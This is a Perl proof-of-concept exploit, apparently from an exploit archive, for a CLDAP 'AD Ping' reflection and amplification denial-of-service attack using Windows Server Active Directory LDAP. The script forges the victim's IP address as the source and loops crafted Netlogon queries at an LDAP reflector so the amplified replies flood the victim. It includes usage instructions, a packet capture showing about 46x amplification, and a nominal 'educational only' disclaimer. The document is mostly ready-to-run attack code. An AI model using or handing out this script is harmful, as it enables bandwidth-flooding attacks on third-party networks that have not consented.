Microsoft Windows Server AD LDAP RootDSE Netlogon Denial Of Service
Posted on 05 November 2016
#!/usr/bin/perl # # MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon # (CLDAP "AD Ping") query reflection DoS PoC # # Copyright 2016 (c) Todor Donev # Varna, Bulgaria # todor.donev@gmail.com # https://www.ethical-hacker.org/ # https://www.facebook.com/ethicalhackerorg # http://pastebin.com/u/hackerscommunity # # MS Windows Server 2016 [NOT TESTED !!!] # # Description: # The attacker sends a simple query to a vulnerable reflector # supporting the Connectionless LDAP service (CLDAP) and using # address spoofing makes it appear to originate from the intended # victim. The CLDAP service responds to the spoofed address, # sending unwanted network traffic to the attackeras intended target. # # Amplification techniques allow bad actors to intensify the size # of their attacks, because the responses generated by the LDAP # servers are much larger than the attackeras queries. In this case, # the LDAP service responses are capable of reaching very high # bandwidth and we have seen an average amplification factor of # 46x and a peak of 55x. # # # Disclaimer: # This or previous program is for Educational purpose ONLY. Do not # use it without permission. The usual disclaimer applies, especially # the fact that Todor Donev is not liable for any damages caused by # direct or indirect use of the information or functionality provided # by these programs. The author or any Internet provider bears NO # responsibility for content or misuse of these programs or any # derivatives thereof. By using these programs you accept the fact # that any damage (dataloss, system crash, system compromise, etc.) # caused by the use of these programs is not Todor Donev's # responsibility. # # Use at your own risk and educational # purpose ONLY! # # See also, UDP-based Amplification Attacks: # https://www.us-cert.gov/ncas/alerts/TA14-017A # # # # perl cldapdrdos.pl 192.168.1.112 192.168.1.146 # [ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP "AD Ping") query reflection DoS PoC # [ ====== # [ Usg: cldapdrdos.pl <ldap server> <target> <port> # [ Default port: 389 # [ Example: perl cldapdrdos.pl 192.168.30.56 192.168.1.1 # [ ====== # [ <todor.donev@gmail.com> Todor Donev # [ Facebook: https://www.facebook.com/ethicalhackerorg # [ Website: https://www.ethical-hacker.org/ # [ Sending CLDAP "AD Ping" packets.. # ^C # # tcpdump -i eth0 -c4 port 389 # tcpdump: verbose output suppressed, use -v or -vv for full protocol decode # listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes # 00:00:58.638466 IP attacker.31337 > target.ldap: UDP, length 57 # 00:00:58.639360 IP target.ldap > attacker.31337: UDP, length 2315 ## LOOOL... # 00:00:59.039293 IP attacker.31337 > target.ldap: UDP, length 57 # 00:00:59.041043 IP target.ldap > attacker.31337: UDP, length 2315 ## LOOOL... # 4 packets captured # 6 packets received by filter # 0 packets dropped by kernel # # # use Net::RawIP; print "[ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP "AD Ping") query reflection DoS PoC "; print "[ ====== "; print "[ Usg: $0 <ldap server> <target> <port> "; print "[ Default port: 389 "; print "[ Example: perl $0 192.168.30.56 192.168.1.1 "; print "[ ====== "; print "[ <todor.donev@gmail.com> Todor Donev "; print "[ Facebook: https://www.facebook.com/ethicalhackerorg "; print "[ Website: https://www.ethical-hacker.org/ "; my $cldap = $ARGV[0]; my $target = $ARGV[1]; my $port = $ARGV[2] || '389'; die "[ Error: Port must be between 1 and 65535! " if ($port < 1 || $port > 65535); my $query = "x30x25x02x01x01x63x20x04x00x0a"; $query .= "x01x00x0ax01x00x02x01x00x02x01"; $query .= "x00x01x01x00x87x0bx6fx62x6ax65"; $query .= "x63x74x63x6cx61x73x73x30x00x00"; $query .= "x00x30x84x00x00x00x0ax04x08x4e"; $query .= "x65x74x6cx6fx67x6fx6e"; my $sock = new Net::RawIP({ udp => {} }) or die; print "[ Sending CLDAP "AD Ping" packets.. "; while () { select(undef, undef, undef, 0.40); # Sleep 400 milliseconds $sock->set({ ip => { saddr => $target, daddr => $cldap}, udp => { source => 31337, dest => $port, data => $query} }); $sock->send; }
